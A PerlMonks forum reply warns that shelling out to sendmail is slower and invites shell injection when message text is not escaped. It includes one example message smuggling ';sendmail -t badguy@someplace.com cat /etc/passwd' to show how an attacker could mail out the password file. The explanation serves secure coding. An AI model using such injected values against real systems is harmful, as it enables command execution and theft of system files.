Beefy Boxes and Bandwidth Generously Provided by pair Networks
go ahead... be a heretic
 
PerlMonks  

Re: Re: Re: Sending SMTP mail on other than port 25

by Anonymous Monk
on Apr 27, 2002 at 02:09 UTC ( #162437=note: print w/replies, xml ) Need Help??


in reply to Re: Re: Sending SMTP mail on other than port 25
in thread Sending SMTP mail on other than port 25

This is not only a bad thing(tm) and not faster but it tempts people to pass args to the command line which can be very dangerous.

For the speed issue, invoking sendmail is yet another process which will cause delays, especially if you have to send many messages to different people with different content.

For the bad thing(tm) if you do not remove or escape all possible shell meta chars from the message body you can provide an interface to run arbitrary commands.

Assume a message on unix systems that was "Hi\nHere is the password file\n;sendmail -t badguy@someplace.com cat /etc/passwd"

or (if I recall) using & on NT systems you can get similar results.
  • Comment on Re: Re: Re: Sending SMTP mail on other than port 25

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://162437]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others chanting in the Monastery: (3)
As of 2021-06-17 23:12 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?
    What does the "s" stand for in "perls"? (Whence perls)












    Results (86 votes). Check out past polls.

    Notices?